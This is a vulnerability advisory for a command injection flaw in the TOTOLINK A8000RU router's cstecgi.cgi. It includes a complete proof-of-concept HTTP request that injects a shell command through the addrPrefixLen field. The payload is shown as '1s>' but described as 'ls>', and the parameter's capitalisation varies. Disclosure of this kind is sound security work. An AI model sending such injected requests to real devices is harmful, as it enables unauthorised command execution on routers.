# A8000RU Command Injection Vulnerability Summary ## Vulnerability Overview A command injection vulnerability was discovered in the `cstecgi.cgi` component of the TOTOLINK A8000RU router. Attackers can execute arbitrary operating system commands by crafting malicious requests that exploit the `addrPrefixlen` parameter. ## Affected Scope - **Vendor**: TOTOLINK - **Product**: A8000RU - **Version**: 7.1cu643.b20200521 ## Remediation No specific remediation is currently provided on the vendor's page. It is recommended to contact the vendor to obtain a patch or update the firmware. ## Vulnerability Description The vulnerability exists within `cstecgi.cgi`. An attacker can inject malicious values into the `addrPrefixlen` parameter of a crafted request. This value is passed to the `Uci_Set_Str` function and ultimately executed as a system command via `execv`. ## Proof of Concept (PoC) The following is an example of an HTTP request exploiting this vulnerability: ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.0.1 Content-Length: 97 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Referer: http://192.168.0.1/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=1774573f3212 Connection: Keep-alive {"topicUrl":"setIpv6LanCfg.txt","enableDhcpv6":"1","addrPrefixLen":"1s>./setipv6LanCfg.txt"} ``` ## Result After submitting the above HTTP request, it was observed that a `.txt` file was successfully created, containing a list of filenames from the directory. This confirms that the command `ls>./setipv6LanCfg.txt` was executed successfully.